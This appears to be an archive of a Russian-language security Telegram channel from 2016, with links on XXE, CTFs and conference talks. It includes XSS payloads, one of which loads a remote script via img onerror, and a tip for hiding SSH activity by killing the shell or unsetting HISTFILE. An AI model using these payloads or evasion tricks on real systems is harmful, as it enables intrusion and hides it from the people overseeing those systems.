Size: a a a

2016 March 04
Кавычка
Как ломал одно, а случайно сломалось другое
https://bo0om.ru/vk-xxe-rss
источник
2016 March 17
Кавычка
источник
Кавычка
Кстати говоря, fuzz.txt (bo0om.ru/fuzz.txt) вошёл как дефолтный словарь в dirsearch.

https://github.com/maurosoria/dirsearch

Надо про него потом еще написать :)
источник
2016 March 18
Кавычка
VK - история одного взлома
https://bo0om.ru/vk-xxe-hack
источник
Кавычка
источник
2016 March 24
Кавычка
источник
2016 March 30
Кавычка
Все хакеры - как хакеры. А я - богиня!
источник
Кавычка
https://channel9.msdn.com/Events/Build/Russian-Online-Translation-Build-2016?CR_CC=200771969

А тут трансляция. Только что запустили emacs из bash'а!
Да, в windows запилили BASH! BASH КАРЛ!
источник
2016 March 31
Кавычка
Сегодня второй день Build'а, если кому интересно. Будут опять что-то презентовать и рассказывать про будущее MS.

Трансляция тут https://channel9.msdn.com/
источник
2016 April 01
Кавычка
У тебя спина белая
источник
Кавычка
Классика
источник
2016 April 04
Кавычка
Один из коротких векторов для выполнения JS при XSS атаке:
<q/oncut=alert()>X

Событие oncut сработает, если пользователь попытается вырезать содержимое, т.е. выделет текст и нажмет CTRL+X.
Эксплуатабельность низкая, но для bugbounty, когда жесткие ограничения на длину вектора - сойдёт.
источник
Кавычка
источник
Кавычка
источник
Кавычка
А это более прикольная альтернатива alert'у
<img src onerror="(function(u){var d=document,s=d.createElement('scri'+'pt');s.src=u;(d.head||d.documentElement).appendChild(s);s.parentNode.removeChild(s);}('//bo0om.ru/xss.js'));">

Хоть и боян
источник
2016 April 06
Кавычка
Большая коллекция ссылок по эксплуатации дескриализации в Java
https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
источник
2016 April 07
Кавычка
А вот и доклады с defcon russia подъехали!

Ломаем автомобили с Алексеем Синцовым. Доклад - Testing CAN network with help of CANToolz
Видео - http://www.youtube.com/watch?v=UbkhBIhbh_o
Презентация -
http://www.slideshare.net/AlexeySintsov/testing-can-network-with-help-of-cantoolz
Репозиторий - https://github.com/eik00d/CANToolz

Доклад Александра Большева - Never Trust Your Inputs or How To Fool an ADC
Видео - http://www.youtube.com/watch?v=jH1bgIGUNc0
Презентация -
http://www.slideshare.net/DefconRussia/dcg-25-never-trust-your-inputs-or-how-to-fool-an-adc
источник
2016 April 12
Кавычка
Если ты подключен к SSH и хочешь скрыть, что делалось на машине, полезно после всех действий выполнить kill -9 $$

Это убет собственный процесс, а последние команды в .bash_history не запишутся.

Или можно ввести unset HISTFILE (с пробелом в начале), чтобы не писать в историю вовсе.
источник
Кавычка
Кстати, ночью стартует HackQuest!
http://www.phdays.ru/press/news/46226/
Будет много веба, задача - найти уязвимость, успешно ее проэксплуатировать и достать некий секрет (он же флаг).
Даже если не собираешься что-то выигрывать, можешь попробовать найти уязимости на одном из сайтов, задания будут как легкие, так и хардкорные.
Когда стартанём, еще разок напомню ;)
источник
2016 April 13
Кавычка
Итак, стартует HackQuest

telegram.me/wlrm_phd_hq_bot

А вот и ссылка на участие :)

Да-да, прямо в telegram!

Удачи!
источник